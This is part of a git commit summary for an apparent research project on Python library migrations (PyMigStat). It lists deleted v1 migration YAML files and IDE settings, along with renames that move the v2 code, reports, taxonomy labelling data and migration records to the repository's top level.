9 - .../5924dc0_pycrypto,pycryptodome.yaml | 9 - .../598f275_flask-restplus,flask-restx.yaml | 33 - .../59d8319_flask-restplus,flask-restx.yaml | 22 - .../5a842ae_kafka-python,confluent-kafka.yaml | 45 - v1/data/migration/5c76c96_xlrd,openpyxl.yaml | 9 - v1/data/migration/5cb810e_pil,pillow.yaml | 16 - .../5ded32a_pycrypto,pycryptodome.yaml | 9 - .../migration/5eb6909_eventlet,gevent.yaml | 11 - .../migration/5f2c76c_py-bcrypt,bcrypt.yaml | 12 - .../5f4d92a_slackclient,slack-sdk.yaml | 20 - .../migration/633e7d1_gevent,eventlet.yaml | 9 - .../6b0f04a_pycrypto,pycryptodome.yaml | 9 - .../6b10345_kafka-python,confluent-kafka.yaml | 22 - .../6b629d0_flask-restplus,flask-restx.yaml | 50 - .../migration/6e7ee63_requests,aiohttp.yaml | 9 - .../70b3abc_mysql-python,pymysql.yaml | 12 - .../migration/71aff3a_retrying,tenacity.yaml | 28 - .../728f86e_django-rest-swagger,drf-yasg.yaml | 15 - .../migration/7811c8f_eventlet,gevent.yaml | 9 - v1/data/migration/7ba8676_logbook,loguru.yaml | 13 - v1/data/migration/7ea7ddb_flask,quart.yaml | 24 - .../813214e_slackclient,slack-sdk.yaml | 21 - v1/data/migration/85d50bb_pil,pillow.yaml | 61 - v1/data/migration/86244b6_pyqt5,pyside6.yaml | 97 - v1/data/migration/8778a80_pil,pillow.yaml | 12 - v1/data/migration/87a5671_xlrd,openpyxl.yaml | 9 - .../migration/89b64c6_raven,sentry-sdk.yaml | 13 - .../89c7afc_pymilvus-orm,pymilvus.yaml | 13 - .../migration/8d0ec68_retrying,tenacity.yaml | 
13 - .../8ef3b62_flask-restful,flask-restplus.yaml | 30 - v1/data/migration/902b66d_pil,pillow.yaml | 9 - .../9291b54_pycryptodome,pycryptodomex.yaml | 35 - .../936761f_dataproperty,typepy.yaml | 14 - .../963f347_gcloud-aio-core,aiohttp.yaml | 13 - .../9abf7b1_slackclient,slack-sdk.yaml | 27 - v1/data/migration/9c85d66_pil,pillow.yaml | 9 - .../migration/a4c347a_eventlet,gevent.yaml | 12 - ...12d_flask-security,flask-security-too.yaml | 16 - .../migration/a5c04bb_requests,aiohttp.yaml | 24 - .../a688034_flask-restplus,flask-restx.yaml | 9 - v1/data/migration/a7375cc_celery,rq.yaml | 12 - .../a7f4c3f_pymilvus-orm,pymilvus.yaml | 12 - v1/data/migration/aa607bd_flask,quart.yaml | 25 - .../migration/ab4e5fd_requests,aiohttp.yaml | 14 - .../ae216dd_pycrypto,pycryptodome.yaml | 9 - .../b19aae1_pycrypto,pycryptodome.yaml | 12 - .../migration/b2c9313_requests,aiohttp.yaml | 9 - v1/data/migration/b687d20_huey,celery.yaml | 15 - .../migration/b86b375_raven,sentry-sdk.yaml | 22 - .../migration/b955ac9_ruamel.yaml,pyyaml.yaml | 34 - .../migration/b9b65c0_pyyaml,ruamel.yaml.yaml | 119 - v1/data/migration/baca6bb_urllib,urllib3.yaml | 9 - .../bbeb755_scapy-python3,scapy.yaml | 16 - v1/data/migration/bed73dc_urllib,urllib3.yaml | 9 - v1/data/migration/c08ec7a_huey,celery.yaml | 29 - .../migration/c77913a_eventlet,gevent.yaml | 9 - .../migration/c7c5a13_raven,sentry-sdk.yaml | 9 - .../migration/cbaf252_python-ldap,ldap3.yaml | 14 - .../migration/cc47b42_python-ldap,ldap3.yaml | 14 - .../cdaff15_pycrypto,cryptography.yaml | 12 - v1/data/migration/cdb6679_pil,pillow.yaml | 9 - v1/data/migration/cec78f4_pil,pillow.yaml | 12 - .../migration/cf856c0_gevent,eventlet.yaml | 27 - .../migration/d10cb16_raven,sentry-sdk.yaml | 18 - .../d15540f_gcloud-aio-core,aiohttp.yaml | 12 - .../migration/d3a9a16_requests,aiohttp.yaml | 33 - .../migration/d3bedb7_raven,sentry-sdk.yaml | 9 - .../d4119a0_flask-restful,flask-restplus.yaml | 16 - ...on-social-auth,social-auth-app-django.yaml | 9 - v1/data/migration/d6cd8df_pyqt5,pyside6.yaml | 9 - .../migration/d707ff6_gevent,eventlet.yaml | 13 - ...on-social-auth,social-auth-app-django.yaml | 9 - .../d8dedc7_pycrypto,pycryptodome.yaml | 18 - .../migration/dac43f8_gunicorn,waitress.yaml | 9 - v1/data/migration/db7f132_flask,quart.yaml | 13 - .../dcd48ef_fuzzywuzzy,rapidfuzz.yaml | 17 - v1/data/migration/dd3b266_urllib,urllib3.yaml | 10 - .../dec4ae0_scapy-python3,scapy.yaml | 9 - .../migration/df57533_raven,sentry-sdk.yaml | 9 - .../e192ca6_pycrypto,pycryptodome.yaml | 13 - .../migration/e38ec14_raven,sentry-sdk.yaml | 9 - v1/data/migration/e418cdc_pil,pillow.yaml | 9 - .../e5073e4_pymilvus-orm,pymilvus.yaml | 15 - .../e6b17da_pycrypto,pycryptodome.yaml | 10 - .../e706486_slackclient,slack-sdk.yaml | 24 - .../e7d4fd5_fuzzywuzzy,rapidfuzz.yaml | 13 - .../migration/ea23791_raven,sentry-sdk.yaml | 13 - .../migration/ee4d526_pyyaml,ruamel.yaml.yaml | 18 - .../f0761b8_scapy-python3,scapy.yaml | 16 - .../f08e9f1_mysql-python,pymysql.yaml | 22 - .../migration/f1120d3_raven,sentry-sdk.yaml | 37 - .../migration/f5ba90e_pyyaml,ruamel.yaml.yaml | 12 - .../migration/f6230c7_py-bcrypt,bcrypt.yaml | 13 - .../migration/f69877c_python-ldap,ldap3.yaml | 9 - .../migration/f7d2ea4_raven,sentry-sdk.yaml | 9 - v1/data/migration/f970b54_pil,pillow.yaml | 12 - v1/data/migration/fe6b437_pil,pillow.yaml | 9 - .../fe8e65d_dotenv,python-dotenv.yaml | 9 - v2/code/.idea/.gitignore | 8 - v2/code/.idea/PyMigStat.iml | 23 - .../inspectionProfiles/Project_Default.xml | 7 - 
 .../inspectionProfiles/profiles_settings.xml | 7 -
 v2/code/.idea/misc.xml | 7 -
 v2/code/.idea/modules.xml | 8 -
 v2/code/.idea/other.xml | 7 -
 v2/code/.idea/vcs.xml | 6 -
 v2/code/README.md | 20 -
 v2/code/pymigstat/runnables/__init__.py | 0
 v2/code/pymigstat/taxonomy/__init__.py | 0
 1170 files changed, 12 insertions(+), 81529 deletions(-)
 rename {v2/code => code}/.gitignore (100%)
 rename {v2/code => code}/LICENSE (100%)
 rename {v2/code => code}/configs/config.yaml (100%)
 rename {v1/code/core => code/pymigstat}/__init__.py (100%)
 rename {v1/code/query => code/pymigstat/code_change_search}/__init__.py (100%)
 rename {v2/code => code}/pymigstat/code_change_search/diff_meta_parser.py (100%)
 rename {v2/code => code}/pymigstat/code_change_search/find_code_changes.py (100%)
 rename {v2/code => code}/pymigstat/code_change_search/usage_resolver.py (100%)
 rename {v2/code => code}/pymigstat/complexity/__init__.py (100%)
 rename {v2/code => code}/pymigstat/complexity/max_cardinality.py (100%)
 rename {v2/code => code}/pymigstat/complexity/mfiles_migration_complexity.py (100%)
 rename {v2/code => code}/pymigstat/complexity/mig_loc.py (100%)
 rename {v2/code => code}/pymigstat/complexity/migration_metric.py (100%)
 rename {v2/code => code}/pymigstat/complexity/num_apis.py (100%)
 rename {v2/code => code}/pymigstat/complexity/num_changes.py (100%)
 rename {v2/code => code}/pymigstat/complexity/pe_set.py (100%)
 rename {v2/code => code}/pymigstat/complexity/prop_set.py (100%)
 rename {v2/code => code}/pymigstat/complexity/unique_apis.py (100%)
 rename {v2/code => code}/pymigstat/complexity/unique_mappings.py (100%)
 rename {v2/code => code}/pymigstat/config.py (100%)
 rename {v2/code/pymigstat => code/pymigstat/core}/__init__.py (100%)
 rename {v2/code => code}/pymigstat/core/import_statement_finder.py (100%)
 rename {v2/code => code}/pymigstat/core/pypi_cache.py (100%)
 rename {v2/code => code}/pymigstat/csv_helper.py (100%)
 rename {v2/code/pymigstat/code_change_search => code/pymigstat/datamodels}/__init__.py (100%)
 rename {v2/code => code}/pymigstat/datamodels/api_mapping.py (100%)
 rename {v2/code => code}/pymigstat/datamodels/data_reader.py (100%)
 rename {v2/code => code}/pymigstat/datamodels/datamodel.py (100%)
 rename {v2/code => code}/pymigstat/datamodels/loaders.py (100%)
 rename {v2/code => code}/pymigstat/datamodels/migration.py (100%)
 rename {v2/code => code}/pymigstat/datamodels/storage.py (100%)
 rename {v2/code/pymigstat/core => code/pymigstat/latex}/__init__.py (100%)
 rename {v2/code => code}/pymigstat/latex/core.py (100%)
 rename {v2/code => code}/pymigstat/latex/graphics.py (100%)
 rename {v2/code => code}/pymigstat/latex/tables.py (100%)
 rename {v2/code => code}/pymigstat/latex/utils.py (100%)
 rename {v2/code => code}/pymigstat/pymigstat.py (100%)
 rename {v2/code => code}/pymigstat/reports/__init__.py (100%)
 rename {v2/code => code}/pymigstat/reports/api_mapping_data.py (100%)
 rename {v2/code => code}/pymigstat/reports/api_mapping_stats.py (100%)
 rename {v2/code => code}/pymigstat/reports/big_combination_stats.py (100%)
 rename {v2/code => code}/pymigstat/reports/cardinality_stat.py (100%)
 rename {v2/code => code}/pymigstat/reports/code_change_summary.py (100%)
 rename {v2/code => code}/pymigstat/reports/data_stats.py (100%)
 rename {v2/code => code}/pymigstat/reports/export_constant_data.py (100%)
 rename {v2/code => code}/pymigstat/reports/lib_pair_data.py (100%)
 rename {v2/code => code}/pymigstat/reports/lib_pair_stats.py (100%)
 rename {v2/code => code}/pymigstat/reports/mig_effort_stats.py (100%)
 rename {v2/code => code}/pymigstat/reports/migration_summary.py (100%)
 rename {v2/code => code}/pymigstat/reports/misc.py (100%)
 rename {v2/code => code}/pymigstat/reports/signature_change_stat.py (100%)
 rename {v2/code => code}/pymigstat/reports/update_report_data.py (100%)
 rename {v2/code/pymigstat/datamodels => code/pymigstat/runnables}/__init__.py (100%)
 rename {v2/code => code}/pymigstat/runnables/clean_up_data_files.py (100%)
 rename {v2/code => code}/pymigstat/runnables/convert_pymigbench_data.py (100%)
 rename {v2/code => code}/pymigstat/runnables/download_repos.py (100%)
 rename {v2/code => code}/pymigstat/runnables/filter_migration_data.py (100%)
 rename {v2/code => code}/pymigstat/runnables/find_all_code_changes.py (100%)
 rename {v2/code => code}/pymigstat/runnables/sample_migrations_for_code_change_labeling.py (100%)
 rename {v2/code/pymigstat/latex => code/pymigstat/taxonomy}/__init__.py (100%)
 rename {v2/code => code}/pymigstat/taxonomy/agreement_rate.py (100%)
 rename {v2/code => code}/pymigstat/taxonomy/agreement_rate_round_1.py (100%)
 rename {v2/code => code}/pymigstat/taxonomy/combine_rounds.py (100%)
 rename {v2/code => code}/pymigstat/taxonomy/constants.py (100%)
 rename {v2/code => code}/pymigstat/taxonomy/export_yaml.py (100%)
 rename {v2/code => code}/pymigstat/taxonomy/generate_taxonomy.py (100%)
 rename {v2/code => code}/pymigstat/taxonomy/merge_labellings.py (100%)
 rename {v2/code => code}/pymigstat/taxonomy/merge_labellings_round_1.py (100%)
 rename {v2/code => code}/pymigstat/tools/__init__.py (100%)
 rename {v2/code => code}/pymigstat/tools/external_tool.py (100%)
 rename {v2/code => code}/pymigstat/tools/git_repo_wrapper.py (100%)
 rename {v2/code => code}/pymigstat/utils/__init__.py (100%)
 rename {v2/code => code}/pymigstat/utils/gpt_client.py (100%)
 rename {v2/code => code}/pymigstat/utils/progress.py (100%)
 rename {v2/code => code}/pymigstat/utils/utils.py (100%)
 rename {v2/code => code}/report/code-changes.csv (100%)
 rename {v2/code => code}/report/combined-ccs-raw.csv (100%)
 rename {v2/code => code}/report/data-stats.csv (100%)
 rename {v2/code => code}/report/effort.csv (100%)
 rename {v2/code => code}/report/migration-combination--with-fc-groups.csv (100%)
 rename {v2/code => code}/report/migration-combination.csv (100%)
 rename {v2/code => code}/report/migrations.csv (100%)
 rename {v2/code => code}/report/taxonomy-stat-table.csv (100%)
 rename {v2/code => code}/requirements.txt (100%)
 rename {v2/code => code}/taxonomy-data/round1--merge.csv (100%)
 rename {v2/code => code}/taxonomy-data/round1-ajay.csv (100%)
 rename {v2/code => code}/taxonomy-data/round1-ildar.csv (100%)
 rename {v2/code => code}/taxonomy-data/round1-moha.csv (100%)
 rename {v2/code => code}/taxonomy-data/round1-sarah.csv (100%)
 rename {v2/code => code}/taxonomy-data/round2--merge.csv (100%)
 rename {v2/code => code}/taxonomy-data/round2-ajay.csv (100%)
 rename {v2/code => code}/taxonomy-data/round2-ildar.csv (100%)
 rename {v2/code => code}/taxonomy-data/round2-moha.csv (100%)
 rename {v2/code => code}/taxonomy-data/round2-sarah.csv (100%)
 rename {v2/code => code}/taxonomy-data/round3--merge.csv (100%)
 rename {v2/code => code}/taxonomy-data/round3-ajay.csv (100%)
 rename {v2/code => code}/taxonomy-data/round3-ildar.csv (100%)
 rename {v2/code => code}/taxonomy-data/round3-moha.csv (100%)
 rename {v2/code => code}/taxonomy-data/round3-sarah.csv (100%)
 rename {v2/data => data}/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml (100%)
 rename {v2/data => data}/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml (100%)
 rename {v2/data => data}/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__amesar@mlflow-tools__431737a.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__ansible-community@molecule__b7d7740.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__clearmatics@ion__03fb3a3.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__godaddy@tartufo__553dc5f.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__grahame@sedge__3badf07.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__himkt@pyner__76106a9.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__klensy@wt-tools__760ff36.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__kxr@o-must-gather__9da4722.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__lqez@hog__d722ade.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__martinthoma@hwrt__86bc433.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__oca@maintainer-tools__69593ae.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml (100%)
 rename {v2/data => data}/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml (100%)
 rename {v2/data => data}/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml (100%)
 rename {v2/data => data}/migration/argparse__docopt__ceph@teuthology__fb32105.yaml (100%)
 rename {v2/data => data}/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml (100%)
 rename {v2/data => data}/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml (100%)
 rename {v2/data => data}/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml (100%)
 rename {v2/data => data}/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml (100%)
 rename {v2/data => data}/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml (100%)
 rename {v2/data => data}/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml (100%)
 rename {v2/data => data}/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml (100%)
 rename {v2/data => data}/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml (100%)
 rename {v2/data => data}/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml (100%)
 rename {v2/data => data}/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml (100%)
 rename {v2/data => data}/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml (100%)
 rename {v2/data => data}/migration/botocore__boto__zalando@spilo__a83681c.yaml (100%)
 rename {v2/data => data}/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml (100%)
 rename {v2/data => data}/migration/bottle__flask__heyman@locust__4067b92.yaml (100%)
 rename {v2/data => data}/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml (100%)
 rename {v2/data => data}/migration/bunch__munch__1and1@confluencer__df895ac.yaml (100%)
 rename {v2/data => data}/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml (100%)
 rename {v2/data => data}/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml (100%)
 rename {v2/data => data}/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml (100%)
 rename {v2/data => data}/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml (100%)
 rename {v2/data => data}/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml (100%)
 rename {v2/data => data}/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml (100%)
 rename {v2/data => data}/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml (100%)
 rename {v2/data => data}/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml (100%)
 rename {v2/data => data}/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml (100%)
 rename {v2/data => data}/migration/click__argparse__nodepy@nodepy__715142c.yaml (100%)
 rename {v2/data => data}/migration/click__argparse__titusz@onixcheck__f17d186.yaml (100%)
 rename {v2/data => data}/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml (100%)
 rename {v2/data => data}/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml (100%)
 rename {v2/data => data}/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml (100%)
 rename {v2/data => data}/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml (100%)
 rename {v2/data => data}/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml (100%)
 rename {v2/data => data}/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml (100%)
 rename {v2/data => data}/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml (100%)
 rename {v2/data => data}/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml (100%)
 rename {v2/data => data}/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml (100%)
 rename {v2/data => data}/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml (100%)
 rename {v2/data => data}/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml (100%)
 rename {v2/data => data}/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml (100%)
 rename {v2/data => data}/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml (100%)
 rename {v2/data => data}/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml (100%)
 rename {v2/data => data}/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml (100%)
 rename {v2/data => data}/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml (100%)
 rename {v2/data => data}/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml (100%)
 rename {v2/data => data}/migration/django__utils__rq@django-rq__310ac1d.yaml (100%)
 rename {v2/data => data}/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml (100%)
 rename {v2/data => data}/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml (100%)
 rename {v2/data => data}/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml (100%)
 rename {v2/data => data}/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml (100%)
 rename {v2/data => data}/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml (100%)
 rename {v2/data => data}/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml (100%)
 rename {v2/data => data}/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml (100%)
 rename {v2/data => data}/migration/eventlet__gevent__c00w@bithopper__6612526.yaml (100%)
 rename {v2/data => data}/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml (100%)
 rename {v2/data => data}/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml (100%)
 rename {v2/data => data}/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml (100%)
 rename {v2/data => data}/migration/fabric3__invoke__skoczen@will__437f8be.yaml (100%)
 rename {v2/data => data}/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml (100%)
 rename {v2/data => data}/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml (100%)
 rename {v2/data => data}/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml (100%)
 rename {v2/data => data}/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml (100%)
 rename {v2/data => data}/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml (100%)
 rename {v2/data => data}/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml (100%)
 rename {v2/data => data}/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml (100%)
 rename {v2/data => data}/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml (100%)
 rename {v2/data => data}/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml (100%)
 rename {v2/data => data}/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml (100%)
 rename {v2/data => data}/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml (100%)
 rename {v2/data => data}/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml (100%)
 rename {v2/data => data}/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml (100%)
 rename {v2/data => data}/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml (100%)
 rename {v2/data => data}/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml (100%)
 rename {v2/data => data}/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml (100%)
 rename {v2/data => data}/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml (100%)
 rename {v2/data => data}/migration/flask__tornado__krischer@instaseis__13c26a6.yaml (100%)
 rename {v2/data => data}/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml (100%)
 rename {v2/data => data}/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml (100%)
 rename {v2/data => data}/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml (100%)
 rename {v2/data => data}/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml (100%)
 rename {v2/data => data}/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml (100%)
 rename {v2/data => data}/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml (100%)
 rename {v2/data => data}/migration/gcloud__google__wal-e@wal-e__be9820b.yaml (100%)
 rename {v2/data => data}/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml (100%)
 rename {v2/data => data}/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml (100%)
 rename {v2/data => data}/migration/gevent__eventlet__projectcalico@felix__657e727.yaml (100%)
 rename {v2/data => data}/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml (100%)
 rename {v2/data => data}/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml (100%)
 rename {v2/data => data}/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml (100%)
 rename {v2/data => data}/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml (100%)
 rename {v2/data => data}/migration/html5lib__bleach__posativ@isso__f1a4478.yaml (100%)
 rename {v2/data => data}/migration/html5lib__bleach__pycon@pycon__3dba963.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__ankitects@anki__f6245cd.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__jarodl@flask-github__341c769.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__openstack@deb-nova__346d941.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml (100%)
 rename {v2/data => data}/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml (100%)
 rename {v2/data => data}/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml (100%)
 rename {v2/data => data}/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml (100%)
 rename {v2/data => data}/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml (100%)
 rename {v2/data => data}/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml (100%)
 rename {v2/data => data}/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml (100%)
 rename {v2/data => data}/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml (100%)
 rename {v2/data => data}/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml (100%)
 rename {v2/data => data}/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml (100%)
 rename {v2/data => data}/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml (100%)
 rename {v2/data => data}/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml (100%)
 rename {v2/data => data}/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml (100%)
 rename {v2/data => data}/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml (100%)
 rename {v2/data => data}/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml (100%)
 rename {v2/data => data}/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml (100%)
 rename {v2/data => data}/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml (100%)
 rename {v2/data => data}/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml (100%)
 rename {v2/data => data}/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml (100%)
 rename {v2/data => data}/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml (100%)
 rename {v2/data => data}/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml (100%)
 rename {v2/data => data}/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml (100%)
 rename {v2/data => data}/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml (100%)
 rename {v2/data => data}/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml (100%)
 rename {v2/data => data}/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml (100%)
 rename {v2/data => data}/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml (100%)
 rename {v2/data => data}/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml (100%)
 rename {v2/data => data}/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml (100%)
 rename {v2/data => data}/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml (100%)
 rename {v2/data => data}/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml (100%)
 rename {v2/data => data}/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml (100%)
 rename {v2/data => data}/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml (100%)
 rename {v2/data => data}/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml (100%)
 rename {v2/data => data}/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml (100%)
 rename {v2/data => data}/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml (100%)
 rename {v2/data => data}/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml (100%)
 rename {v2/data => data}/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml (100%)
